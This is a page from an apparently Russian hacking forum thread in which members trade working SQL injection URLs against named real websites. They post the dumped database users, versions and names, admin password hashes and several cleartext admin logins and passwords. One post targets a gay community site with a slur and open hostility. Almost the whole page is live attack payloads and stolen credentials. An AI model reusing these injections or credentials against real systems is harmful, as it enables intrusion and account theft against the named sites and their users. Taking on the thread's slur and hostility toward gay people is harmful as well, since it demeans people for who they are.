SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. cash$$$

    CJLO.com
    VERSION: 4.1.21-log
    DATABASE: cjlocom
    USER: cjlocom@localhost

    iqmagazineonline.com
    VERSION: 4.1.20
    DATABASE: iqmag
    USER: iqmag@localhost

    hdtvmagazine.com
    VERSION: 4.1.20-standard-log
    DATABASE: main
    USER: hdtv_web@localhost
    //output is in the title


    OUR-KIEV.com
    VERSION: 5.0.41-community
    USER: ourkiev_ourkiev@localhost
    DATABASE: ourkiev_main

    banksandbrokersfootball.co.uk
    VERSION: 4.0.24_Debian-10sarge2-log
    USER: web176u1@localhost
    DATABASE: web176db1

    outerbanksbeach.com
    VERSION: 4.1.20
    DATABASE: outerbanksbeach
    USER: obbuser@localhost
     
    1 person likes this.
  2. gibson

    ameritron.com whoever finishes digging into it, well done)
    thermatex.co.uk
    5.0.51-log:[email protected]:thermat_thermatex_co_uk
    kupiteplo.ru
    4.1.21-log:00105446@localhost:db00105446
    locksafe.com.au
    4.1.20-log:[email protected]:locksafe
    blueovalindustries.com
    5.0.51a:webaccess@localhost:blueovalindustries
    provenrepellents.com
    realwheel.net
    4.1.22-standard:realecg_dba@localhost:realecg_real
    harvestsafe.com
    5.0.51a:webaccess@localhost:bluekey2
    adam-rouilly.co.uk
    4.1.22-standard:adam_adam@localhost:adam_adamrouilly
     
  3. 159932

    101.ru
    didn't manage to get any output, and I'm too lazy to keep guessing
     
    2 people like this.
  4. vp$

    www.finnews.ru Site TIC: finnews.ru - 1300
    http://www.finnews.ru/activity.php?id=50000+union+select+concat_ws(0x3a,username,user_password,user_email,user_icq)+from+phpbb_users+limit+1,1/*

    vsheff:f09dfc16c0947a6db07c337967b2634a:[email protected]:99596309
    the hash won't brute-force at all and doesn't work for the ICQ account
     
  5. Kakoytoxaker

    159932
    here's the output, you got the columns wrong:
    _http://www.101.ru/?an=guest_book&kw1=-33'+union+select+1,2,3,4,5,6,version(),8,user(),database(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
     
    1 person likes this.
  6. CaNNabi$

    www.dom-zdorovja.ru
    Code:
    http://www.dom-zdorovja.ru/doc.php?id=0x3727%20union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6/*
    domzdor7_alexey@localhost:domzdor7_shop:4.1.22-log

    www.brendgoda.ru
    Code:
    http://brendgoda.ru/ru/news/index.php?id=0x363227%20union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10/*
    bestbrand@localhost:bestbrand:4.1.22
     
    3 people like this.
  7. cash$$$

    elevatemagazine.com
    VERSION: 5.0.22
    USER: root@localhost
    DATABASE: elevatemag

    skratchmagazine.com
    VERSION: 4.0.24-nt
    USER: skratch@localhost
    DATABASE: skratchmagazine

    pkgmagazine.com
    VERSION: 4.1.20
    USER: [email protected]
    DATABASE: pkg

    drumheadmag.com
    VERSION: 4.1.13-standard
    USER: drumhead_head@localhost
    DATABASE: drumhead_drum
     
    3 people like this.
  8. BizzyD

    Code:
    http://www.ns.umich.edu/htdocs/public/experts/ExpDisplay.php?ExpID=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56/*
    [email protected]:news:4.1.21-max-log 2 4



    Code:
    http://www.unexplained-mysteries.com/viewarticle.php?id=57+union+select+1,2,3,4,5/*
    [email protected]:unexplai_forum:4.1.22-standard-log



    Code:
    http://www.joesportsfan.com/column.php?storyid=99999+union+select+1,2,3,4,5/*
    [email protected]:joesportsfan:5.0.18-standard-log
     
  9. Kakoytoxaker

    I present to your attention the site of MOLDOVAN F*****S (how do you like that phrase?) :D

    _http://www.gay.md/rus/story.php?sid=-634'+union+select+1,2,3,user(),5,version(),database(),8,9,10,11/*

    gaymd@localhost
    4.1.21
    gaymd_

    It's the 4.x branch, but the table is a standard one

    _http://www.gay.md/rus/story.php?sid=-634'+union+select+1,2,3,4,5,concat(name,char(58),password),7,8,9,10,11+from+admins/*

    Note the nicknames
    Only one got cracked, but I didn't try very hard


    I really don't like them :p
     
    2 people like this.
  10. cash$$$

    webpagemaintenance.com
    VERSION: 4.0.20-Max
    USER: wpm@localhost
    DATABASE: wpmdb

    web-site-development.biz
    VERSION: 4.1.22-log
    USER: wsd@localhost
    DATABASE: wsd_site

    mh1webdesign.com
    VERSION: 4.1.22-standard
    USER: mh1webde_mikey@localhost
    DATABASE: mh1webde_articles

    simplewebinc.com
    VERSION: 4.1.22-standard
    USER: simple@localhost
    DATABASE: simple_greeting
     
  11. neon_fx

    http://www.pchardware.ro/Download/index.php?catid=-2+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11/*

    a0lb5v@localhost
    a00la
    4.1.12


    http://www.idapp.org/faqs/index.php?catid=-5+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12/*
     
    #4951 neon_fx, 3 Mar 2008
    Last edited: 3 Mar 2008
  12. Saime

    voiloo.net

    voiloo@localhost:voiloo:5.0.32-Debian_7-log

    admin:[email protected]:faba9f262f73605bb0ad8f2ff4ae19d1

    admin:springfield

    ///

    hemija.net

    igor@localhost:5.0.45-log:hemija
     
  13. Saime

    freshairtimes.com

    [email protected]:5.0.18:scammerz
    -----

    askimam.org

    [email protected]:5.0.41-community-nt:askimam
    [email protected]:sufi@usa
    [email protected]:nasir
     
    #4953 Saime, 3 Mar 2008
    Last edited: 3 Mar 2008
  14. SIdoy

    www.vetmag.ru

    http://www.vetmag.ru/admin/
    login:vetmag
    pass:moromo33



    www.vettorg.ru

     
    3 people like this.
  15. Saime

    kungfumagazine.com

    root@localhost:4.0.22:kungfu
    root:07c02f3e4a89a46b
     
    1 person likes this.
  16. CaNNabi$

    http://www.ve.free-travels.ru/
    Code:
    http://ve.free-travels.ru/books/item.php?id=0x3127%20union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),database(),version()),13,14,15/*
    freetravels_db@localhost:freetravels_db:5.0.27-log

    http://www.maxilog.su/
    Code:
    http://www.maxilog.su/see_news.php?storyid=0x363227%20union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user(),database(),version()),11,12,13,14,15,16,17,18,19/*
    [email protected]:db_maxilog1:5.0.24-standard

    Well, just because :rolleyes:
    Code:
    http://www.fernando-heitor.de/index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
    http://www.dan-werbe.net/index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
    http://www.annuairedesecoles.net/index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
    http://www.annuairedesecoles.com/index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
    http://www.empleopropio.com/empleos/index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
    
     
    4 people like this.
  17. CaNNabi$

    Ziggy Marley
    So right now I'm sitting here thinking about it... (well, you know what I mean))) and I started listening to some Bob Marley tunes, and then somehow came across Ziggy Marley and his site :)
    And I found an injection right away)
    Code:
    http://ziggymarley.com/comments.php?id=194'%20union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9/*
    
    [email protected]:tuffgong_main:4.1.20-log
    That's how it is :p
    bbb ; )
     
  18. cash$$$

    cheap-web-hosting-info.com
    VERSION: 4.1.20-max-log Review and 4.1.20-max-log Plans
    USER: [email protected] Review and [email protected] Plans
    DATABASE: cheapwe_cheapweb Review and cheapwe_cheapweb Plans

    yi-hosting.com
    VERSION: 4.1.22-log
    USER: [email protected]
    DATABASE: michell_data

    visitrandolphcounty.com
    PHP:
    http://www.visitrandolphcounty.com/shopping.php?id=99999+union+select+1,2,VERSION(),4,5,6,7,8,9,10,11,12,13,14,15,16/*
    VERSION: 4.1.20
    USER: visitran@localhost
    DATABASE: visitrandolph

    plaza-shopping.com
    VERSION: 4.0.27-max-log
    USER: [email protected]
    DATABASE: plazashopping
     
    1 person likes this.
  19. Digital Cat

    Boys, help. How do I fish the passwords out of the DB? :( So far everything has ended in an error((
    http://www.angelbaby.ru/tovar.php?ld=1+union+select+1,2,user(),database(),5,6,7,version(),9,10,11,12,13/*
    Code:
    babykn@localhost 
    5.0.45-community
    babykn_angel
    
    CHARACTER_SETS
    COLLATIONS
    COLLATION_CHARACTER_SET_APPLICABILITY
    COLUMNS
    COLUMN_PRIVILEGES
    KEY_COLUMN_USAGE
    PROFILING
    ROUTINES
    SCHEMATA
    SCHEMA_PRIVILEGES
    STATISTICS
    TABLES
    TABLE_CONSTRAINTS
    TABLE_PRIVILEGES
    TRIGGERS
    USER_PRIVILEGES
    VIEWS
    arhiv
    category
    disttxt
    links
    news
    news_img
    others
    pages
    produkt
     
    4 people like this.
  20. BizzyD

    Code:
    http://www.ipoding.com/index.php?catid=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
    ipoding@localhost:ipoding_rouge:4.0.21-log
     